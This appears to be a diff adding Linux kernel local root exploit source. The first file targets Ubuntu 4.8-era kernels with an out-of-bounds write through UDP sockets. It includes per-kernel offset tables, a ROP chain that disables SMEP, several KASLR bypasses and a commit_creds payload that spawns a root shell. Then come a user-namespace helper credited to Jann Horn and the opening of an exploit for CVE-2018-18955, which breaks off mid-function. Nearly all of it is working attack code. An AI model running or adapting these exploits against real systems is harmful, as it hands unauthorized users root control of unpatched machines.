+	{ "xenial", "4.8.0-53-generic", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x01b170, 0x43a0da, 0x63e843, 0x07bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
+};
+
+// Used to get root privileges.
+#define COMMIT_CREDS			(KERNEL_BASE + kernels[kernel].commit_creds)
+#define PREPARE_KERNEL_CRED		(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
+
+// Used when ENABLE_SMEP_BYPASS is used.
+// - xchg eax, esp ; ret
+// - pop rdi ; ret
+// - mov dword ptr [rdi], eax ; ret
+// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
+// - neg rax ; ret
+// - pop rcx ; ret 
+// - or rax, rcx ; ret
+// - xchg eax, edi ; ret
+// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
+// - jmp rcx
+#define XCHG_EAX_ESP_RET		(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
+#define POP_RDI_RET			(KERNEL_BASE + kernels[kernel].pop_rdi_ret)
+#define MOV_DWORD_PTR_RDI_EAX_RET	(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
+#define MOV_RAX_CR4_RET			(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
+#define NEG_RAX_RET			(KERNEL_BASE + kernels[kernel].neg_rax_ret)
+#define POP_RCX_RET			(KERNEL_BASE + kernels[kernel].pop_rcx_ret)
+#define OR_RAX_RCX_RET			(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
+#define XCHG_EAX_EDI_RET		(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
+#define MOV_CR4_RDI_RET			(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
+#define JMP_RCX				(KERNEL_BASE + kernels[kernel].jmp_rcx)
+
+// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
+
+typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
+
+void get_root(void) {
+	((_commit_creds)(COMMIT_CREDS))(
+	    ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
+}
+
+// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
+
+uint64_t saved_esp;
+
+// Unfortunately GCC does not support `__atribute__((naked))` on x86, which
+// can be used to omit a function's prologue, so I had to use this weird
+// wrapper hack as a workaround. Note: Clang does support it, which means it
+// has better support of GCC attributes than GCC itself. Funny.
+void wrapper() {
+	asm volatile ("					\n\
+	payload:					\n\
+		movq %%rbp, %%rax			\n\
+		movq $0xffffffff00000000, %%rdx		\n\
+		andq %%rdx, %%rax			\n\
+		movq %0, %%rdx				\n\
+		addq %%rdx, %%rax			\n\
+		movq %%rax, %%rsp			\n\
+		call get_root				\n\
+		ret					\n\
+	" : : "m"(saved_esp) : );
+}
+
+void payload();
+
+#define CHAIN_SAVE_ESP				\
+	*stack++ = POP_RDI_RET;			\
+	*stack++ = (uint64_t)&saved_esp;	\
+	*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
+
+#define SMEP_MASK 0x100000
+
+#define CHAIN_DISABLE_SMEP			\
+	*stack++ = MOV_RAX_CR4_RET;		\
+	*stack++ = NEG_RAX_RET;			\
+	*stack++ = POP_RCX_RET;			\
+	*stack++ = SMEP_MASK;			\
+	*stack++ = OR_RAX_RCX_RET;		\
+	*stack++ = NEG_RAX_RET;			\
+	*stack++ = XCHG_EAX_EDI_RET;		\
+	*stack++ = MOV_CR4_RDI_RET;
+
+#define CHAIN_JMP_PAYLOAD                     \
+	*stack++ = POP_RCX_RET;               \
+	*stack++ = (uint64_t)&payload;        \
+	*stack++ = JMP_RCX;
+
+void mmap_stack() {
+	uint64_t stack_aligned, stack_addr;
+	int page_size, stack_size, stack_offset;
+	uint64_t* stack;
+
+	page_size = getpagesize();
+
+	stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
+	stack_addr = stack_aligned - page_size * 4;
+	stack_size = page_size * 8;
+	stack_offset = XCHG_EAX_ESP_RET % page_size;
+
+	stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
+			MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+	if (stack == MAP_FAILED || stack != (void*)stack_addr) {
+		dprintf("[-] mmap()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	stack = (uint64_t*)((char*)stack_aligned + stack_offset);
+
+	CHAIN_SAVE_ESP;
+	CHAIN_DISABLE_SMEP;
+	CHAIN_JMP_PAYLOAD;
+}
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+struct ubuf_info {
+	uint64_t callback;	// void (*callback)(struct ubuf_info *, bool)
+	uint64_t ctx;		// void *
+	uint64_t desc;		// unsigned long
+};
+
+struct skb_shared_info {
+	uint8_t nr_frags;	// unsigned char
+	uint8_t tx_flags;	// __u8
+	uint16_t gso_size;	// unsigned short
+	uint16_t gso_segs;	// unsigned short
+	uint16_t gso_type;	// unsigned short
+	uint64_t frag_list;	// struct sk_buff *
+	uint64_t hwtstamps;	// struct skb_shared_hwtstamps
+	uint32_t tskey;		// u32
+	uint32_t ip6_frag_id;	// __be32
+	uint32_t dataref;	// atomic_t
+	uint64_t destructor_arg; // void *
+	uint8_t frags[16][17];	// skb_frag_t frags[MAX_SKB_FRAGS];
+};
+
+struct ubuf_info ui;
+
+void init_skb_buffer(char* buffer, unsigned long func) {
+	struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
+	memset(ssi, 0, sizeof(*ssi));
+
+	ssi->tx_flags = 0xff;
+	ssi->destructor_arg = (uint64_t)&ui;
+	ssi->nr_frags = 0;
+	ssi->frag_list = 0;
+
+	ui.callback = func;
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+#define SHINFO_OFFSET 3164
+
+void oob_execute(unsigned long payload) {
+	char buffer[4096];
+	memset(&buffer[0], 0x42, 4096);
+	init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
+
+	int s = socket(PF_INET, SOCK_DGRAM, 0);
+	if (s == -1) {
+		dprintf("[-] socket()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	struct sockaddr_in addr;
+	memset(&addr, 0, sizeof(addr));
+	addr.sin_family = AF_INET;
+	addr.sin_port = htons(8000);
+	addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+	if (connect(s, (void*)&addr, sizeof(addr))) {
+		dprintf("[-] connect()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
+	int rv = send(s, buffer, size, MSG_MORE);
+	if (rv != size) {
+		dprintf("[-] send()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	int val = 1;
+	rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
+	if (rv != 0) {
+		dprintf("[-] setsockopt(SO_NO_CHECK)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	send(s, buffer, 1, 0);
+
+	close(s);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+	int f = open(file, O_RDONLY);
+	if (f == -1)
+		return -1;
+	int bytes_read = 0;
+	while (true) {
+		int bytes_to_read = CHUNK_SIZE;
+		if (bytes_to_read > max_length - bytes_read)
+			bytes_to_read = max_length - bytes_read;
+		int rv = read(f, &buffer[bytes_read], bytes_to_read);
+		if (rv == -1)
+			return -1;
+		bytes_read += rv;
+		if (rv == 0)
+			return bytes_read;
+	}
+}
+
+#define LSB_RELEASE_LENGTH 1024
+
+void get_distro_codename(char* output, int max_length) {
+	char buffer[LSB_RELEASE_LENGTH];
+	char* path = "/etc/lsb-release";
+	int length = read_file(path, &buffer[0], LSB_RELEASE_LENGTH);
+	if (length == -1) {
+               dprintf("[-] open/read(%s)\n", path);
+               exit(EXIT_FAILURE);
+	}
+	const char *needle = "DISTRIB_CODENAME=";
+	int needle_length = strlen(needle);
+	char* found = memmem(&buffer[0], length, needle, needle_length);
+	if (found == NULL) {
+		dprintf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
+		exit(EXIT_FAILURE);
+	}
+	int i;
+	for (i = 0; found[needle_length + i] != '\n'; i++) {
+		if (i >= max_length) {
+			exit(EXIT_FAILURE);
+		}
+		if ((found - &buffer[0]) + needle_length + i >= length) {
+			exit(EXIT_FAILURE);
+		}
+		output[i] = found[needle_length + i];
+	}
+}
+
+struct utsname get_kernel_version() {
+	struct utsname u;
+	int rv = uname(&u);
+	if (rv != 0) {
+		dprintf("[-] uname()\n");
+		exit(EXIT_FAILURE);
+	}
+	return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+#define DISTRO_CODENAME_LENGTH 32
+
+void detect_kernel() {
+	char codename[DISTRO_CODENAME_LENGTH];
+	struct utsname u;
+
+	u = get_kernel_version();
+
+	if (strstr(u.machine, "64") == NULL) {
+		dprintf("[-] system is not using a 64-bit kernel\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (strstr(u.version, "-Ubuntu") == NULL) {
+		dprintf("[-] system is not using an Ubuntu kernel\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (strstr(u.version, "14.04.1")) {
+		strcpy(&codename[0], "trusty");
+	} else if (strstr(u.version, "16.04.1")) {
+		strcpy(&codename[0], "xenial");
+	} else {
+		get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);
+
+		// Linux Mint kernel release mappings
+		if (!strcmp(&codename[0], "qiana"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "rebecca"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "rafaela"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "rosa"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "sarah"))
+			strcpy(&codename[0], "xenial");
+		if (!strcmp(&codename[0], "serena"))
+			strcpy(&codename[0], "xenial");
+		if (!strcmp(&codename[0], "sonya"))
+			strcpy(&codename[0], "xenial");
+	}
+
+	int i;
+	for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+		if (strcmp(&codename[0], kernels[i].distro) == 0 &&
+		    strcmp(u.release, kernels[i].version) == 0) {
+			dprintf("[.] kernel version '%s' detected\n", kernels[i].version);
+			kernel = i;
+			return;
+		}
+	}
+
+	dprintf("[-] kernel version not recognized\n");
+	exit(EXIT_FAILURE);
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
+int smap_smep_enabled() {
+	char buffer[PROC_CPUINFO_LENGTH];
+	char* path = "/proc/cpuinfo";
+	int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+	if (length == -1) {
+		dprintf("[-] open/read(%s)\n", path);
+		exit(EXIT_FAILURE);
+	}
+	int rv = 0;
+	char* found = memmem(&buffer[0], length, "smep", 4);
+	if (found != NULL)
+		rv += 1;
+	found = memmem(&buffer[0], length, "smap", 4);
+	if (found != NULL)
+		rv += 2;
+	return rv;
+}
+
+void check_smep_smap() {
+	int rv = smap_smep_enabled();
+	if (rv >= 2) {
+		dprintf("[-] SMAP detected, no bypass available\n");
+		exit(EXIT_FAILURE);
+	}
+#if !ENABLE_SMEP_BYPASS
+	if (rv >= 1) {
+		dprintf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n");
+		exit(EXIT_FAILURE);
+	}
+#endif
+}
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+bool mmap_syslog(char** buffer, int* size) {
+	*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+	if (*size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+		return false;
+	}
+
+	*size = (*size / getpagesize() + 1) * getpagesize();
+	*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
+				   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+	*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+	if (*size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+		return false;
+	}
+
+	return true;
+}
+
+unsigned long get_kernel_addr_trusty(char* buffer, int size) {
+	const char* needle1 = "Freeing unused";
+	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+	if (substr == NULL) return 0;
+
+	int start = 0;
+	int end = 0;
+	for (end = start; substr[end] != '-'; end++);
+
+	const char* needle2 = "ffffff";
+	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+	if (substr == NULL) return 0;
+
+	char* endptr = &substr[16];
+	unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+	r &= 0xffffffffff000000ul;
+
+	return r;
+}
+
+unsigned long get_kernel_addr_xenial(char* buffer, int size) {
+	const char* needle1 = "Freeing unused";
+	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+	if (substr == NULL) {
+		return 0;
+	}
+
+	int start = 0;
+	int end = 0;
+	for (start = 0; substr[start] != '-'; start++);
+	for (end = start; substr[end] != '\n'; end++);
+
+	const char* needle2 = "ffffff";
+	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+	if (substr == NULL) {
+		return 0;
+	}
+
+	char* endptr = &substr[16];
+	unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+	r &= 0xfffffffffff00000ul;
+	r -= 0x1000000ul;
+
+	return r;
+}
+
+unsigned long get_kernel_addr_syslog() {
+	unsigned long addr = 0;
+	char* syslog;
+	int size;
+
+	dprintf("[.] trying syslog...\n");
+
+	if (!mmap_syslog(&syslog, &size))
+		return 0;
+
+	if (strcmp("trusty", kernels[kernel].distro) == 0)
+		addr = get_kernel_addr_trusty(syslog, size);
+	if (strcmp("xenial", kernels[kernel].distro) == 0)
+		addr = get_kernel_addr_xenial(syslog, size);
+
+	if (!addr)
+		dprintf("[-] kernel base not found in syslog\n");
+
+	return addr;
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_kallsyms() {
+	FILE *f;
+	unsigned long addr = 0;
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	char* path = "/proc/kallsyms";
+
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_sysmap() {
+	FILE *f;
+	unsigned long addr = 0;
+	char path[512] = "/boot/System.map-";
+	char version[32];
+
+	struct utsname u;
+	u = get_kernel_version();
+	strcat(path, u.release);
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_mincore() {
+	unsigned char buf[getpagesize()/sizeof(unsigned char)];
+	unsigned long iterations = 20000000;
+	unsigned long addr = 0;
+
+	dprintf("[.] trying mincore info leak...\n");
+	/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+	if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
+		MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+		dprintf("[-] mmap()\n");
+		return 0;
+	}
+
+	int i;
+	for (i = 0; i <= iterations; i++) {
+		/* Touch a mishandle with this type mapping */
+		if (mincore((void*)0x86000000, 0x1000000, buf)) {
+			dprintf("[-] mincore()\n");
+			return 0;
+		}
+
+		int n;
+		for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+			addr = *(unsigned long*)(&buf[n]);
+			/* Kernel address space */
+			if (addr > 0xffffffff00000000) {
+				addr &= 0xffffffffff000000ul;
+				if (munmap((void*)0x66000000, 0x20000000000))
+					dprintf("[-] munmap()\n");
+				return addr;
+			}
+		}
+	}
+
+	if (munmap((void*)0x66000000, 0x20000000000))
+		dprintf("[-] munmap()\n");
+
+	dprintf("[-] kernel base not found in mincore info leak\n");
+	return 0;
+}
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+	unsigned long addr = 0;
+
+	addr = get_kernel_addr_kallsyms();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_sysmap();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_syslog();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_mincore();
+	if (addr) return addr;
+
+	dprintf("[-] KASLR bypass failed\n");
+	exit(EXIT_FAILURE);
+
+	return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static bool write_file(const char* file, const char* what, ...) {
+	char buf[1024];
+	va_list args;
+	va_start(args, what);
+	vsnprintf(buf, sizeof(buf), what, args);
+	va_end(args);
+	buf[sizeof(buf) - 1] = 0;
+	int len = strlen(buf);
+
+	int fd = open(file, O_WRONLY | O_CLOEXEC);
+	if (fd == -1)
+		return false;
+	if (write(fd, buf, len) != len) {
+		close(fd);
+		return false;
+	}
+	close(fd);
+	return true;
+}
+
+void setup_sandbox() {
+	int real_uid = getuid();
+	int real_gid = getgid();
+
+	if (unshare(CLONE_NEWUSER) != 0) {
+		dprintf("[!] unprivileged user namespaces are not available\n");
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (unshare(CLONE_NEWNET) != 0) {
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (!write_file("/proc/self/setgroups", "deny")) {
+		dprintf("[-] write_file(/proc/self/set_groups)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
+		dprintf("[-] write_file(/proc/self/uid_map)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
+		dprintf("[-] write_file(/proc/self/gid_map)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	cpu_set_t my_set;
+	CPU_ZERO(&my_set);
+	CPU_SET(0, &my_set);
+	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
+		dprintf("[-] sched_setaffinity()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (system("/sbin/ifconfig lo mtu 1500") != 0) {
+		dprintf("[-] system(/sbin/ifconfig lo mtu 1500)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (system("/sbin/ifconfig lo up") != 0) {
+		dprintf("[-] system(/sbin/ifconfig lo up)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+void exec_shell() {
+	int fd;
+
+	fd = open("/proc/1/ns/net", O_RDONLY);
+	if (fd == -1) {
+		dprintf("error opening /proc/1/ns/net\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (setns(fd, CLONE_NEWNET) == -1) {
+		dprintf("error calling setns\n");
+		exit(EXIT_FAILURE);
+	}
+
+	system(SHELL);
+}
+
+bool is_root() {
+	// We can't simple check uid, since we're running inside a namespace
+	// with uid set to 0. Try opening /etc/shadow instead.
+	int fd = open("/etc/shadow", O_RDONLY);
+	if (fd == -1)
+		return false;
+	close(fd);
+	return true;
+}
+
+void check_root() {
+	dprintf("[.] checking if we got root\n");
+	if (!is_root()) {
+		dprintf("[-] something went wrong =(\n");
+		return;
+	}
+	dprintf("[+] got r00t ^_^\n");
+	exec_shell();
+}
+
+int main(int argc, char** argv) {
+	if (argc > 1) SHELL = argv[1];
+
+	dprintf("[.] starting\n");
+
+	dprintf("[.] checking kernel version\n");
+	detect_kernel();
+	dprintf("[~] done, version looks good\n");
+
+	dprintf("[.] checking SMEP and SMAP\n");
+	check_smep_smap();
+	dprintf("[~] done, looks good\n");
+
+	dprintf("[.] setting up namespace sandbox\n");
+	setup_sandbox();
+	dprintf("[~] done, namespace sandbox set up\n");
+
+#if ENABLE_KASLR_BYPASS
+	dprintf("[.] KASLR bypass enabled, getting kernel addr\n");
+	KERNEL_BASE = get_kernel_addr();
+	dprintf("[~] done, kernel addr:   %lx\n", KERNEL_BASE);
+#endif
+
+	dprintf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
+	dprintf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
+
+	unsigned long payload = (unsigned long)&get_root;
+
+#if ENABLE_SMEP_BYPASS
+	dprintf("[.] SMEP bypass enabled, mmapping fake stack\n");
+	mmap_stack();
+	payload = XCHG_EAX_ESP_RET;
+	dprintf("[~] done, fake stack mmapped\n");
+#endif
+
+	dprintf("[.] executing payload %lx\n", payload);
+	oob_execute(payload);
+	dprintf("[~] done, should be root now\n");
+
+	check_root();
+
+	return 0;
+}
@@ -0,0 +1,52 @@
+// subshell.c
+// author: Jann Horn
+// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <grp.h>
+#include <err.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sched.h>
+#include <sys/wait.h>
+
+int main() {
+  int sync_pipe[2];
+  char dummy;
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
+
+  pid_t child = fork();
+  if (child == -1) err(1, "fork");
+  if (child == 0) {
+    close(sync_pipe[1]);
+    if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
+    if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
+
+    if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
+    execl("/bin/bash", "bash", NULL);
+    err(1, "exec");
+  }
+
+  close(sync_pipe[0]);
+  if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
+  char pbuf[100];
+  sprintf(pbuf, "/proc/%d", (int)child);
+  if (chdir(pbuf)) err(1, "chdir");
+  const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
+  int uid_map = open("uid_map", O_WRONLY);
+  if (uid_map == -1) err(1, "open uid map");
+  if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
+  close(uid_map);
+  int gid_map = open("gid_map", O_WRONLY);
+  if (gid_map == -1) err(1, "open gid map");
+  if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
+  close(gid_map);
+  if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
+
+  int status;
+  if (wait(&status) != child) err(1, "wait");
+  return 0;
+}
@@ -0,0 +1,272 @@
+// subuid_shell.c - Linux local root exploit for CVE-2018-18955
+// Exploits broken uid/gid mapping in nested user namespaces.
+// ---
+// Mostly stolen from Jann Horn's exploit:
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
+// Some code stolen from Xairy's exploits:
+// - https://github.com/xairy/kernel-exploits
+// ---
+// <bcoles@gmail.com>
+// - added auto subordinate id mapping
+// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
+
+#define _GNU_SOURCE
+
+#include <unistd.h>
+#include <fcntl.h>
+#include <grp.h>
+#include <pwd.h>
+#include <sched.h>
+#include <stdio.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/wait.h>
+#include <stdarg.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <sys/prctl.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+char* SUBSHELL = "./subshell";
+
+
+// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+static int write_file(const char* file, const char* what, ...) {
+  char buf[1024];
+  va_list args;
+  va_start(args, what);
+  vsnprintf(buf, sizeof(buf), what, args);
+  va_end(args);
+  buf[sizeof(buf) - 1] = 0;
+  int len = strlen(buf);
+
+  int fd = open(file, O_WRONLY | O_CLOEXEC);
+  if (fd == -1)
+    return -1;
+  if (write(fd, buf, len) != len) {
+    close(fd);
+    return -1;
+  }
+  close(fd);
+  return 0;
+}
+
+
+// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
+
+int get_subuid(char* output, int max_length) {
+  char buffer[1024];
+  char* path = "/etc/subuid";
+  int length = read_file(path, &buffer[0], sizeof(buffer));
+  if (length == -1)
+    return -1;
+
+  int real_uid = getuid();
+  struct passwd *u = getpwuid(real_uid);
+
+  char needle[1024];
+  sprintf(needle, "%s:", u->pw_name);
+  int needle_length = strlen(needle);
+  char* found = memmem(&buffer[0], length, needle, needle_length);
+  if (found == NULL)
+    return -1;
+
+  int i;
+  for (i = 0; found[needle_length + i] != ':'; i++) {
+    if (i >= max_length)
+      return -1;
+    if ((found - &buffer[0]) + needle_length + i >= length)
+      return -1;
+    output[i] = found[needle_length + i];
+  }
+
+  return 0;
+}
+
+int get_subgid(char* output, int max_length) {
+  char buffer[1024];
+  char* path = "/etc/subgid";
+  int length = read_file(path, &buffer[0], sizeof(buffer));
+  if (length == -1)
+    return -1;
+
+  int real_gid = getgid();
+  struct group *g = getgrgid(real_gid);
+
+  char needle[1024];
+  sprintf(needle, "%s:", g->gr_name);
+  int needle_length = strlen(needle);
+  char* found = memmem(&buffer[0], length, needle, needle_length);
+  if (found == NULL)
+    return -1;
+
+  int i;
+  for (i = 0; found[needle_length + i] != ':'; i++) {
+    if (i >= max_length)
+      return -1;
+    if ((found - &buffer[0]) + needle_length + i >= length)
+      return -1;
+    output[i] = found[needle_length + i];
+  }
+
+  return 0;
+}
+
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
+
+int main(int argc, char** argv) {
+  if (argc > 1) SUBSHELL = argv[1];
+
+  dprintf("[.] starting\n");
+
+  dprintf("[.] setting up namespace\n");
+
+  int sync_pipe[2];
+  char dummy;
+
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
+    dprintf("[-] pipe\n");
+    exit(EXIT_FAILURE);
+  }
+
+  pid_t child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork");
+    exit(EXIT_FAILURE);
+  }
+
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    close(sync_pipe[1]);
+
+    if (unshare(CLONE_NEWUSER) != 0) {
+      dprintf("[-] unshare(CLONE_NEWUSER)\n");
+      exit(EXIT_FAILURE);
+    }
+
+    if (unshare(CLONE_NEWNET) != 0) {
+      dprintf("[-] unshare(CLONE_NEWNET)\n");
+      exit(EXIT_FAILURE);
+    }
+
+    if (write(sync_pipe[0], "X", 1) != 1) {
+      dprintf("write to sock\n");
+      exit(EXIT_FAILURE);
+    }
+
+    if (read(sync_pipe[0], &dummy, 1) != 1) {
+      dprintf("[-] read from sock\n");
+      exit(EXIT_FAILURE);
+    }
+
+    if (setgid(0)) {
+      dprintf("[-] setgid");
+      exit(EXIT_FAILURE);
+    }
+
+    if (setuid(0)) {
+      printf("[-] setuid");
+      exit(EXIT_FAILURE);
+    }
+
